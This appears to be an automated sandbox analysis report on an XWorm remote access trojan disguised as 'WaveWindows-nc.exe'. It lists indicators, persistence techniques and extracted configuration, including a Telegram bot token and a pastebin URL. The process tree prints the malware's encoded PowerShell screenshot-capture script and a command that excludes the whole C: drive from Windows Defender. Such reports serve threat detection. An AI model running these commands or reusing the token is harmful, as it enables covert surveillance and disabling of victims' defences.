xworm | c7a74e51044e62ab518f212afb21d7fbe6ad6cc428868ebb8729e754bd8b0b10

Analysis

max time kernel
230s
max time network
239s
platform
windows11-21h2_x64
resource
win11-20240709-en
resource tags

arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
submitted
22/07/2024, 05:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Wave/WaveWindows-nc.exe
Size

5.5MB
MD5

e9c64620dc920a64a2448e78de1cff90
SHA1

08e62b663da83d2fe304bba18381e87192313201
SHA256

26838283be0848527497674165c96a7683ccdbac999d8a226d9878a3ca7717a5
SHA512

83ef90821b8da79218c20c0ab287c1155f6d9fe36bee0419187ef215c73a66c33502966cfef4c17ac89502777518f1d00357387716ef914b0c82b0615ea12fc3
SSDEEP

49152:N3hTD+mOHaN2e1AUgbOtf7s51lL7Grsm4IPMWnjy5EAP+VZ1LojCWvzThoCW0vai:RJj2etsR7Ggm2Ey1yJvUyb

Score

10^/10

xworm execution persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

C9IM3x5CL1ZIpfuG

Attributes

Install_directory
%LocalAppData%
install_file
ReAgentC.exe
pastebin_url
https://pastebin.com/raw/UWpQULMP
telegram
https://api.telegram.org/bot7420124943:AAF1r0gN9LdH2HJhpp3RjQMBU2cphBasfrs

aes.plain

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000300000002aa87-47.dat	family_xworm
behavioral2/memory/4200-49-0x0000000000D80000-0x0000000000D92000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1932	powershell.exe
1948	powershell.exe
1276	powershell.exe
3572	powershell.exe
1192	powershell.exe
2128	powershell.exe

Downloads MZ/PE file

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ReAgentC.lnk	temp.bin
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ReAgentC.lnk	temp.bin

Executes dropped EXE 5 IoCs

pid	Process
4200	temp.bin
1216	ReAgentC.exe
2168	ReAgentC.exe
5720	ReAgentC.exe
4168	ReAgentC.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000\Software\Microsoft\Windows\CurrentVersion\Run\ReAgentC = "C:\\Users\\Admin\\AppData\\Local\\ReAgentC.exe"	temp.bin

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
1	discord.com
4	discord.com
7	pastebin.com
8	pastebin.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	api.ipify.org
2	api.ipify.org

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_01cf530faf2f1752\display.PNF	chrome.exe
File created	\??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_01cf530faf2f1752\display.PNF	chrome.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	6	Go-http-client/1.1

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133660996578632855"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000_Classes\Local Settings	chrome.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	WaveWindows-nc.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	WaveWindows-nc.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	WaveWindows-nc.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\wv.zip:Zone.Identifier	chrome.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5152	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4200	temp.bin

Suspicious behavior: EnumeratesProcesses 55 IoCs

pid	Process
2128	powershell.exe
2128	powershell.exe
1192	powershell.exe
1192	powershell.exe
1932	powershell.exe
1932	powershell.exe
1948	powershell.exe
1948	powershell.exe
1276	powershell.exe
1276	powershell.exe
3572	powershell.exe
3572	powershell.exe
4200	temp.bin
4472	chrome.exe
4472	chrome.exe
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
4200	temp.bin
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe
1628	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2128	powershell.exe
Token: SeDebugPrivilege	1192	powershell.exe
Token: SeDebugPrivilege	4200	temp.bin
Token: SeDebugPrivilege	1932	powershell.exe
Token: SeDebugPrivilege	1948	powershell.exe
Token: SeDebugPrivilege	1276	powershell.exe
Token: SeDebugPrivilege	3572	powershell.exe
Token: SeDebugPrivilege	4200	temp.bin
Token: SeDebugPrivilege	1216	ReAgentC.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeDebugPrivilege	2168	ReAgentC.exe

Suspicious use of FindShellTrayWindow 45 IoCs

pid	Process
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4200	temp.bin

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5732 wrote to memory of 2128	5732	WaveWindows-nc.exe	78
PID 5732 wrote to memory of 2128	5732	WaveWindows-nc.exe	78
PID 2128 wrote to memory of 3148	2128	powershell.exe	80
PID 2128 wrote to memory of 3148	2128	powershell.exe	80
PID 3148 wrote to memory of 5092	3148	csc.exe	81
PID 3148 wrote to memory of 5092	3148	csc.exe	81
PID 5732 wrote to memory of 1192	5732	WaveWindows-nc.exe	82
PID 5732 wrote to memory of 1192	5732	WaveWindows-nc.exe	82
PID 5732 wrote to memory of 4200	5732	WaveWindows-nc.exe	84
PID 5732 wrote to memory of 4200	5732	WaveWindows-nc.exe	84
PID 4200 wrote to memory of 1932	4200	temp.bin	85
PID 4200 wrote to memory of 1932	4200	temp.bin	85
PID 4200 wrote to memory of 1948	4200	temp.bin	87
PID 4200 wrote to memory of 1948	4200	temp.bin	87
PID 4200 wrote to memory of 1276	4200	temp.bin	89
PID 4200 wrote to memory of 1276	4200	temp.bin	89
PID 4200 wrote to memory of 3572	4200	temp.bin	91
PID 4200 wrote to memory of 3572	4200	temp.bin	91
PID 4200 wrote to memory of 5152	4200	temp.bin	93
PID 4200 wrote to memory of 5152	4200	temp.bin	93
PID 4472 wrote to memory of 4940	4472	chrome.exe	102
PID 4472 wrote to memory of 4940	4472	chrome.exe	102
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 5232	4472	chrome.exe	103
PID 4472 wrote to memory of 4508	4472	chrome.exe	104
PID 4472 wrote to memory of 4508	4472	chrome.exe	104
PID 4472 wrote to memory of 5472	4472	chrome.exe	105
PID 4472 wrote to memory of 5472	4472	chrome.exe	105
PID 4472 wrote to memory of 5472	4472	chrome.exe	105
PID 4472 wrote to memory of 5472	4472	chrome.exe	105
PID 4472 wrote to memory of 5472	4472	chrome.exe	105
PID 4472 wrote to memory of 5472	4472	chrome.exe	105
PID 4472 wrote to memory of 5472	4472	chrome.exe	105
PID 4472 wrote to memory of 5472	4472	chrome.exe	105
PID 4472 wrote to memory of 5472	4472	chrome.exe	105
PID 4472 wrote to memory of 5472	4472	chrome.exe	105

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Wave\WaveWindows-nc.exe
"C:\Users\Admin\AppData\Local\Temp\Wave\WaveWindows-nc.exe"
1⤵
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:5732
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2128
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ryd345hd\ryd345hd.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3148
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA5C5.tmp" "c:\Users\Admin\AppData\Local\Temp\ryd345hd\CSC2FE68A61A3F645148FDE65863EC8FDA3.TMP"
      4⤵
      PID:5092
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Add-MpPreference -ExclusionPath \"C:\\\""
  2⤵
  - Command and Scripting Interpreter: PowerShell
